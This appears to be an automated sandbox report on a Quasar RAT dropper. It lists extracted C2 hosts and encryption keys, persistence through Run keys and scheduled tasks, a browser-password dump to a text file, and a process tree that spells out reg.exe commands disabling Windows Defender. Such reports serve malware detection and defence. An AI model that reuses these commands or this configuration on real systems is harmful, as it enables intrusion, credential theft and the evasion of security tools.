Analysis
-
max time kernel
148s -
max time network
168s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
10-03-2022 18:45
Static task
static1
Behavioral task
behavioral1
Sample
50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
Resource
win10v2004-en-20220113
General
-
Target
50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
-
Size
6.2MB
-
MD5
942b78bcd8a5aa6d10436832b1260671
-
SHA1
e35e87e58f94e304dd0b97e9b85c6cb30146978d
-
SHA256
50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90
-
SHA512
89baba3a305d1d6969b68e4f63c294a861fc755f65ac6d0f5a67f7d6b7aa26cd852f78ce0441af489a70991a9cd0887388687d89efd0f1fb95fb316490d030e3
Malware Config
Extracted
quasar
2.1.0.0
Windows Security Notification
minecraftgaming009-61323.portmap.io:61323
VNM_MUTEX_c2q7y2ayYutZ2XaYe7
-
encryption_key
1oSvdU99XhcwnNYl3rB8
-
install_name
Windows Security Notification.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Security Notification
-
subdirectory
SubDir
Extracted
quasar
1.4.0.0
Steam
Minecrafthosting6969-35389.portmap.io:35389
EAojkiVMQ0sDtyACyi
-
encryption_key
P5xHRD8P5ncR2T1uRpgp
-
install_name
Steam.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Steam
-
subdirectory
SubDir
Signatures
-
Contains code to disable Windows Defender 13 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x00060000000125df-68.dat disable_win_def behavioral1/files/0x00060000000125df-67.dat disable_win_def behavioral1/memory/1348-78-0x0000000000C60000-0x0000000000CF6000-memory.dmp disable_win_def behavioral1/files/0x0006000000013096-101.dat disable_win_def behavioral1/files/0x0006000000013096-102.dat disable_win_def behavioral1/files/0x0006000000013096-103.dat disable_win_def behavioral1/memory/1484-104-0x00000000012D0000-0x0000000001366000-memory.dmp disable_win_def behavioral1/files/0x0006000000013096-117.dat disable_win_def behavioral1/files/0x0006000000013096-116.dat disable_win_def behavioral1/files/0x0006000000013096-115.dat disable_win_def behavioral1/files/0x0006000000013096-114.dat disable_win_def behavioral1/files/0x0006000000013096-121.dat disable_win_def behavioral1/files/0x0006000000013096-123.dat disable_win_def -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Quasar Payload 14 IoCs
resource yara_rule behavioral1/files/0x00060000000125df-68.dat family_quasar behavioral1/files/0x00060000000125df-67.dat family_quasar behavioral1/memory/1228-70-0x0000000000410000-0x000000000047A000-memory.dmp family_quasar behavioral1/memory/1348-78-0x0000000000C60000-0x0000000000CF6000-memory.dmp family_quasar behavioral1/files/0x0006000000013096-101.dat family_quasar behavioral1/files/0x0006000000013096-102.dat family_quasar behavioral1/files/0x0006000000013096-103.dat family_quasar behavioral1/memory/1484-104-0x00000000012D0000-0x0000000001366000-memory.dmp family_quasar behavioral1/files/0x0006000000013096-117.dat family_quasar behavioral1/files/0x0006000000013096-116.dat family_quasar behavioral1/files/0x0006000000013096-115.dat family_quasar behavioral1/files/0x0006000000013096-114.dat family_quasar behavioral1/files/0x0006000000013096-121.dat family_quasar behavioral1/files/0x0006000000013096-123.dat family_quasar -
description flow ioc Process File opened for modification C:\Windows\system32\GDIPFONTCACHEV1.DAT 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 2 ip-api.com Process not Found 20 api64.ipify.org Process not Found 21 api64.ipify.org Process not Found -
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/1912-91-0x000000001B4A0000-0x000000001B7E2000-memory.dmp WebBrowserPassView behavioral1/files/0x000600000001337b-147.dat WebBrowserPassView behavioral1/files/0x000600000001337b-146.dat WebBrowserPassView -
Nirsoft 6 IoCs
resource yara_rule behavioral1/memory/1912-91-0x000000001B4A0000-0x000000001B7E2000-memory.dmp Nirsoft behavioral1/files/0x00060000000132a5-139.dat Nirsoft behavioral1/files/0x00060000000132a5-140.dat Nirsoft behavioral1/files/0x000600000001337b-147.dat Nirsoft behavioral1/files/0x000600000001337b-146.dat Nirsoft behavioral1/files/0x00060000000132db-171.dat Nirsoft -
Executes dropped EXE 11 IoCs
pid Process 1772 Uawisdwhppyu.exe 532 Knfk.exe 1360 Rtsveoxqatvjs.exe 1228 Mtwgkvm.exe 1348 Lzmicakkfbw.exe 1912 RtkBtManServ.exe 1656 Steam.exe 1484 Windows Security Notification.exe 2108 Windows Security Notification.exe 2408 bfsvc.exe 2528 snuvcdsm.exe -
Deletes itself 1 IoCs
pid Process 2692 cmd.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager330825.exe Knfk.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager330825.exe Knfk.exe -
Loads dropped DLL 12 IoCs
pid Process 532 Knfk.exe 1348 Lzmicakkfbw.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 1104 WerFault.exe 1104 WerFault.exe 1104 WerFault.exe 1104 WerFault.exe 1104 WerFault.exe 1720 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features Lzmicakkfbw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Lzmicakkfbw.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Mtwgkvm.exe\"" Mtwgkvm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "\"C:\\Users\\Admin\\AppData\\Roaming\\SubDir\\Steam.exe\"" Steam.exe Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Notification = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Lzmicakkfbw.exe\"" Lzmicakkfbw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Notification = "\"C:\\Windows\\SysWOW64\\SubDir\\Windows Security Notification.exe\"" Windows Security Notification.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 api64.ipify.org 2 ip-api.com 20 api64.ipify.org -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe Windows Security Notification.exe File opened for modification C:\Windows\SysWOW64\SubDir Windows Security Notification.exe File created C:\Windows\SysWOW64\SubDir\r77-x64.dll Lzmicakkfbw.exe File created C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe Lzmicakkfbw.exe File opened for modification C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe Lzmicakkfbw.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 1720 1360 WerFault.exe 29 1104 1484 WerFault.exe 61 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1408 schtasks.exe 1056 schtasks.exe 1900 schtasks.exe 652 schtasks.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Lzmicakkfbw.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Lzmicakkfbw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 RtkBtManServ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e RtkBtManServ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e RtkBtManServ.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1468 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 2408 bfsvc.exe 2528 snuvcdsm.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1360 Rtsveoxqatvjs.exe 2108 Windows Security Notification.exe 1252 powershell.exe 1348 Lzmicakkfbw.exe 1348 Lzmicakkfbw.exe 1348 Lzmicakkfbw.exe 1348 Lzmicakkfbw.exe 1348 Lzmicakkfbw.exe 1348 Lzmicakkfbw.exe 1348 Lzmicakkfbw.exe 2528 snuvcdsm.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 1360 Rtsveoxqatvjs.exe Token: SeDebugPrivilege 1228 Mtwgkvm.exe Token: SeDebugPrivilege 1348 Lzmicakkfbw.exe Token: SeDebugPrivilege 1656 Steam.exe Token: SeDebugPrivilege 1484 Windows Security Notification.exe Token: SeDebugPrivilege 1484 Windows Security Notification.exe Token: SeDebugPrivilege 1912 RtkBtManServ.exe Token: SeDebugPrivilege 2108 Windows Security Notification.exe Token: SeDebugPrivilege 1252 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1484 Windows Security Notification.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 956 wrote to memory of 1772 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 27 PID 956 wrote to memory of 1772 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 27 PID 956 wrote to memory of 1772 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 27 PID 956 wrote to memory of 1772 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 27 PID 956 wrote to memory of 532 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 28 PID 956 wrote to memory of 532 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 28 PID 956 wrote to memory of 532 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 28 PID 956 wrote to memory of 532 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 28 PID 956 wrote to memory of 1360 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 29 PID 956 wrote to memory of 1360 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 29 PID 956 wrote to memory of 1360 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 29 PID 956 wrote to memory of 1360 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 29 PID 956 wrote to memory of 1228 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 30 PID 956 wrote to memory of 1228 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 30 PID 956 wrote to memory of 1228 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 30 PID 956 wrote to memory of 1348 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 31 PID 956 wrote to memory of 1348 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 31 PID 956 wrote to memory of 1348 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 31 PID 956 wrote to memory of 1348 956 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe 31 PID 532 wrote to memory of 1912 532 Knfk.exe 33 PID 532 wrote to memory of 1912 532 Knfk.exe 33 PID 532 wrote to memory of 1912 532 Knfk.exe 33 PID 532 wrote to memory of 1912 532 Knfk.exe 33 PID 1228 wrote to memory of 652 1228 Mtwgkvm.exe 35 PID 1228 wrote to memory of 652 1228 Mtwgkvm.exe 35 PID 1228 wrote to memory of 652 1228 Mtwgkvm.exe 35 PID 1228 wrote to memory of 1656 1228 Mtwgkvm.exe 38 PID 1228 wrote to memory of 1656 1228 Mtwgkvm.exe 38 PID 1228 wrote to memory of 1656 1228 Mtwgkvm.exe 38 PID 532 wrote to memory of 360 532 Knfk.exe 39 PID 532 wrote to memory of 360 532 Knfk.exe 39 PID 532 wrote to memory of 360 532 Knfk.exe 39 PID 532 wrote to memory of 360 532 Knfk.exe 39 PID 360 wrote to memory of 1060 360 cmd.exe 41 PID 360 wrote to memory of 1060 360 cmd.exe 41 PID 360 wrote to memory of 1060 360 cmd.exe 41 PID 360 wrote to memory of 1060 360 cmd.exe 41 PID 1656 wrote to memory of 1408 1656 Steam.exe 42 PID 1656 wrote to memory of 1408 1656 Steam.exe 42 PID 1656 wrote to memory of 1408 1656 Steam.exe 42 PID 360 wrote to memory of 628 360 cmd.exe 44 PID 360 wrote to memory of 628 360 cmd.exe 44 PID 360 wrote to memory of 628 360 cmd.exe 44 PID 360 wrote to memory of 628 360 cmd.exe 44 PID 360 wrote to memory of 1464 360 cmd.exe 45 PID 360 wrote to memory of 1464 360 cmd.exe 45 PID 360 wrote to memory of 1464 360 cmd.exe 45 PID 360 wrote to memory of 1464 360 cmd.exe 45 PID 360 wrote to memory of 1532 360 cmd.exe 46 PID 360 wrote to memory of 1532 360 cmd.exe 46 PID 360 wrote to memory of 1532 360 cmd.exe 46 PID 360 wrote to memory of 1532 360 cmd.exe 46 PID 360 wrote to memory of 1820 360 cmd.exe 47 PID 360 wrote to memory of 1820 360 cmd.exe 47 PID 360 wrote to memory of 1820 360 cmd.exe 47 PID 360 wrote to memory of 1820 360 cmd.exe 47 PID 360 wrote to memory of 640 360 cmd.exe 48 PID 360 wrote to memory of 640 360 cmd.exe 48 PID 360 wrote to memory of 640 360 cmd.exe 48 PID 360 wrote to memory of 640 360 cmd.exe 48 PID 360 wrote to memory of 1340 360 cmd.exe 49 PID 360 wrote to memory of 1340 360 cmd.exe 49 PID 360 wrote to memory of 1340 360 cmd.exe 49 PID 360 wrote to memory of 1340 360 cmd.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe"C:\Users\Admin\AppData\Local\Temp\50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe"1⤵
- Quasar RAT
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe"C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe"2⤵
- Executes dropped EXE
PID:1772
-
-
C:\Users\Admin\AppData\Local\Temp\Knfk.exe"C:\Users\Admin\AppData\Local\Temp\Knfk.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4EpeebWszwq3L5jgvisNmyvGbyVAfjjb/WhkVRHM1jSY9bDQBPQUlA+KOt+q65oQzJt9yxASNarn9KPWpl7VpeJNaoB2sh/pMWGpfd1hNghc5haR0kkZkRiX8yULrHRxs=3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1912 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵PID:2324
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:2380
-
C:\Users\Admin\AppData\Local\Temp\bfsvc.exeC:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2408
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵PID:2456
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:2496
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeC:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:2528
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵PID:2808
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:2844
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:628
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:1464
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:1532
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵PID:1820
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵PID:640
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵PID:1340
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵PID:2032
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤4⤵PID:988
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:1900
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:852
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:736
-
-
